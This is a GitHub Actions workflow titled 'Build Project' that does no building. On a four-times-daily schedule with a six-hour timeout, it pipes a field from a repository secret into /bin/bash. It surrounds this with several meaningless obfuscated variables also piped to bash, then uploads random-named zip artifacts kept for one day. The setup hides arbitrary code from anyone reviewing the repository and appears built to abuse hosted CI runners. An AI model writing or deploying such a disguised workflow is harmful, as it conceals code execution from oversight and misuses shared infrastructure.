name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '12 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          mgh3: ${{ secrets.mgh3 }}
        run: |
          printf '%s' "$mgh3" | jq -r .xcb76595 | /bin/bash
          echo $nimg1 | jq -r .tx08 | /bin/bash
          printf '%s' "$qxrr851" | jq -r .sxe1243 | /bin/bash
          echo $x7791 | jq -r .mubvu06 | /bin/bash
          printf '%s' "$lwksg65" | jq -r .qvd1134 | /bin/bash
          echo $mrql8 | jq -r .qpg08 | /bin/bash
          printf '%s' "$m6209" | jq -r .p7 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: QlucrnQW
          path: "*.zip"
          retention-days: 1
